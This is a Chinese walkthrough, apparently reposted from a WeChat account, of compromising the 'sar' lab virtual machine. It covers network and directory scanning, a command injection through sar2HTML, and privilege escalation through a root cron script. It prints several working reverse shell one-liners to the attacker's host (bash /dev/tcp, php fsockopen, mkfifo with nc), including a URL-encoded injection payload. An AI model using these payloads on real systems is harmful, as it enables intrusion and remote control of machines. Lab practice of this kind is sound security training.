信息收集
nmap -sP 10.0.2.0/24
15是我的kali 那么4就是靶机地址了
扫端口
nmap -sV 10.0.2.4 -p 1-65535
扫目录
dirb http://10.0.2.4/
访问robots.txt 发现有个参数
sar2HTML
直觉告诉我,这是网站使用了某个cms的指纹。
漏洞搜索
http://10.0.2.4/sar2HTML/
反弹shell nc监听
kali:nc -lvnp 9999bash:echo 'bash -i >& /dev/tcp/10.0.2.15/9999 0>&1' |bash
发现没反应,emm,那就换一种吧,反弹shell有很多方式,bash perl python php awk nc 等。
等等,刚开始目录扫描有个phpinfo,那就使用phpinfo进行反弹shell。
php -r '$sock=fsockopen("10.0.2.15",9999);exec("/bin/sh -i &3 2>&3");'
woc 还是不行
通过web进行攻击试试吧
NEW%0Arm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff+%7C+%2Fbin%2Fsh+-i+2%3E%261+%7C+nc+10.0.2.15+9999+%3E%2Ftmp%2Ff%0A
wogao
服了这个老六了,web也不行。
不抓包直接丢 反而可以
使用python 获取shell提示符
python3 -c "import pty;pty.spawn('/bin/bash')"
普通权限,根据ctf经验,也会有两个flag,home下一个,root下一个
那么获取第二个就需要提权了
权限提升
查看网站跟路径 有俩sh文件
根据我多年的运维经验,这必定和定时任务有关系
还真有,还是root权限,那就让他弹shell试试
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.2.15 7777 >/tmp/f" >> write.sh
kali监听
nc -lvnp 7777
来了来了。它带着shell走来了
最终获取了两个flag。game over!
原文始发于微信公众号(轩公子谈技术):OSCP-sar靶场攻防
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论